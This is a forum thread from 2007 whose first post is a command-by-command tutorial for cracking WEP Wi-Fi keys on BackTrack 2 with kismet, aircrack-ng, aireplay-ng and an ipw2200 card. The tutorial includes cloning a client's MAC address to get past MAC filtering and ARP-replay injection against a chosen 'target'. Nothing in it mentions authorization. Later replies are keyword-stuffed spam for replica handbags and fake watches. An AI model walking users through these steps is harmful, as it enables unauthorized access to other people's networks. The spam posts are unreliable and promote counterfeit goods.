| Forum Index » Unix, Linux, BSD, & Mac » BackTrack 2 - Aircrack-ng - ipw2200 |
|
Page 1 of 1 |
|
| Author |
Message |
| kefka |
Posted: Fri May 25, 2007 2:55 am |
|
|
The Man
Joined: 20 Sep 2004
Posts: 462
Location: Atlanta, GA
|
Here's a tutorial for anyone struggling with aircrack and an ipw2200 driver
---------------------
http://kefkahacks.net/~kefka/diewep.txt
---------------------
Code: Cracking WEP on Backtrack v2 with Aircrack-ng and an IPW2200 (Centrino)
-------------
Links:
BackTrack 2 - http://remote-exploit.org/backtrack.html
IPW2200 Injection Patch - http://tinyshell.be/aircrackng/forum/index.php?topic=400.0
-------------
Incredibly Short Legend:
ESSID = SSID (network name, whatever you want to call it)
BSSID = MAC Address
-------------
First we prep the device. Luckily for us, the backtrack team has
already patched our driver. If you're not running backtrack v2, you
will need to patch your driver for injection. Tutorials for this are in
several locations, please bump them on Google if you get the chance.
-------------
# a little bit of recon
# write down your ipw2200 MAC address
ifconfig eth0
# **If they're filtering MAC addresses, you'll need to detect a client (below)
# and clone a valid client's MAC address.
# You can change your MAC by typing.
# --------------
# ifconfig eth0 hw ether <MAC-TO-CLONE>
# --------------
# If you do this, anywhere below that I meantion "your" MAC address,
# I am referring to the cloned MAC address
# open /usr/local/etc/kismet.conf in your favorite editor
# nano and pico are good for linux newbies
# set the 'source' line to reflect ipw2200 like so:
source=ipw2200,eth0,bullshit
# save and run kismet
kismet
# first, hit 'm' to mute the annoying sounds
# then hit 's'and again 'S' to sort by SSID
# let it run for a minute so it can grab a lot of information
# select your target and press [return] to see the information
# **Write down your targets ESSID, BSSID and CHANNEL**
# If you press 'c' you can see a list of clients it may have identified
# these can be useful so if there are any, jot them down as well
Shift-Q to quit kismet
-------------
# enable the rtap interface
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
# setup a fake connection to the access point
# don't worry, it doesn't have to work
# an invalid key is fine for this purpose
iwconfig eth0 ap <AP BSSID>
iwconfig eth0 key s:bullshit
iwconfig eth0 mode managed
# now we bring up both interfaces
ifconfig eth0 up
ifconfig rtap0 up
-------------
Now that the device is prepared, we can start capturing and generating traffic
You will need 2 consoles for this and another if you plan to start
cracking the key while still capturing and generating traffic. Aircrack
is advanced enough to accept new IVs, so this is not a bad idea. It
allows us to start aircrack "early" and crack weaker keys faster.
-------------
# start capturing traffic
airodump-ng --channel <channel> --bssid <AP BSSID> --ivs --write <base filename> rtap0
# start generating traffic
aireplay-ng --arpreplay -b <AP BSSID> -h <your MAC address> -i rtap0 eth0
-------------
After we capture about 200,000 IVs, I start aircrack-ng to try and crack
the key as quickly as possible.
-------------
aircrack-ng -a 1 <your base filename>.ivs
# if it doesn't crack, increase the fudge factor
# it's not a bad idea to multiply it by 2 for each attempt
aircrack-ng -a 1 -f 4 <your base filename>.ivs
-------------
# Screenshot of all three running:
http://kefkahacks.net/~kefka/images/snapshot1.png
# Screenshot of all three running and aircrack-ng success!
http://kefkahacks.net/~kefka/images/snapshot2.png
-------------
Enjoy!
http://kefkahacks.net/~kefka/diewep.txt
Thanks to everyone who made this much easier than it is. |
Last edited by kefka on Fri May 25, 2007 3:52 pm; edited 1 time in total _________________ "Education is the ability to listen to almost anything without losing your temper or your self-confidence."
- Robert Frost
 |
|
| Back to top |
|
| kefka |
Posted: Fri May 25, 2007 4:57 am |
|
|
The Man
Joined: 20 Sep 2004
Posts: 462
Location: Atlanta, GA
|
Snapshot of all 3 running (airodump, aireplay and aircrack)
Snapshot of aircrack finding the key:
 |
_________________ "Education is the ability to listen to almost anything without losing your temper or your self-confidence."
- Robert Frost
 |
|
| Back to top |
|
| kikr |
Posted: Fri May 25, 2007 10:21 pm |
|
|
I Should Be Staff!
Joined: 14 Sep 2004
Posts: 728
|
| Nice, thank you! Would be great if it was possible to run these on a Smartphone |
|
|
| Back to top |
|
| kefka |
Posted: Sat May 26, 2007 3:29 am |
|
|
The Man
Joined: 20 Sep 2004
Posts: 462
Location: Atlanta, GA
|
| I have a linux partition on my video iPod |
_________________ "Education is the ability to listen to almost anything without losing your temper or your self-confidence."
- Robert Frost
 |
|
| Back to top |
|
| kikr |
Posted: Sat May 26, 2007 3:31 pm |
|
|
I Should Be Staff!
Joined: 14 Sep 2004
Posts: 728
|
kefka wrote: I have a linux partition on my video iPod
Interesting. So then I suppose I could put a linux partition on a microSD card? My Smartphone runs Windows Mobile 6 |
|
|
| Back to top |
|
| kefka |
Posted: Sat May 26, 2007 9:58 pm |
|
|
The Man
Joined: 20 Sep 2004
Posts: 462
Location: Atlanta, GA
|
| It could be possible, what's the model number, etc..? Try googling the model number or the brand and add 'linux' to your query. |
_________________ "Education is the ability to listen to almost anything without losing your temper or your self-confidence."
- Robert Frost
 |
|
| Back to top |
|
| yue591qi057 |
Posted: Thu Mar 19, 2009 2:03 am |
|
|
|
ETC-Guru
Joined: 13 Jan 2009
Posts: 325
|
|
| Back to top |
|
| yoyo |
Posted: Sat Jan 30, 2010 2:53 am |
|
|
|
I Should Be Staff!
Joined: 29 Jan 2010
Posts: 492
|
Replica louis vuitton outlet online store 24/7 live service!
Discounted louis vuitton Handbags,Purse & Wallets Online Shop
Specialize in replica handbags of lv. you can find hand bags made from exquisite leather are available at incredible prices. |
|
|
| Back to top |
|
| louis vuitton |
Posted: Wed Mar 10, 2010 2:32 am |
|
|
|
Senior Member
Joined: 10 Mar 2010
Posts: 27
|
louis vuitton and louis vuitton Speedy 30are all over the world as representative of the amount of manual processing, design and status. To this day, Louis Vuitton products are all handmade and strictly controlled to prevent counterfeit products. Even if you purchase the brand from a department store, she was sold by well-trained employees Vuitton.
The story of how the original Louis Vuitton Neverfull MM became a world-renowned brand and status symbol is a rags-to-riches story in the late 19 Century began. In 1835 at the age of 14 years, before he knew anything about luggage, he walked 249 miles to a new life in Paris to make. In 1854 he opened his first boutique in Paris with his flat-top trunks (other tribes of the time stock was rounded off), not stackable, hat boxes, and other travel luxury for the rich. In 1892, Louis Vuitton died and left the business to his son George, who wasted Monogram Canvas Neverfull no time in the name of a global brand. |
|
|
| Back to top |
|
| replicahandbags |
Posted: Fri Jul 09, 2010 2:50 am |
|
|
|
Elite
Joined: 09 Jul 2010
Posts: 277
|
|
| Back to top |
|
| wangan |
Posted: Tue Jul 13, 2010 4:55 am |
|
|
|
Legend
Joined: 13 Jul 2010
Posts: 95
|
| Galactic 36 Automatic is breitling available in six dial colours with the added choice of (obligatory) tag heuer mother-of-pearl and diamond options and comes presented on steel cartier bracelet or leather strap For the 50th anniversary of the first delivery hublot in 1960 of the famed Breguet Type XX watch to the French naval air arm, patek philippe which this year is celebrating its first century of cartier watches service, Breguet is |
|
|
| Back to top |
|
| wangan |
Posted: Tue Jul 13, 2010 4:56 am |
|
|
|
Legend
Joined: 13 Jul 2010
Posts: 95
|
| introducing a contemporary, technically omega watches updated reinterpretation of that legendary chronograph, the Type fake watches XXII design. A 24-hour night-and-day indicator at 3 audemars piguet o'clock tells the wearer whether it is daytime or omega nighttime in the area covered by the second time-zone. At nine o'clock, fake rolex a subdial showing the running seconds making full rotations breitling watches in 30 seconds completes this truly exceptional replica watches timepiece.The timepiece's start function and readout are rolex thus twice as precise. At the heart of this technical exploit |
|
|
| Back to top |
|
| gaolin |
Posted: Mon Jul 19, 2010 4:54 am |
|
|
|
Veteran
Joined: 12 Jul 2010
Posts: 46
|
|
| Back to top |
|
|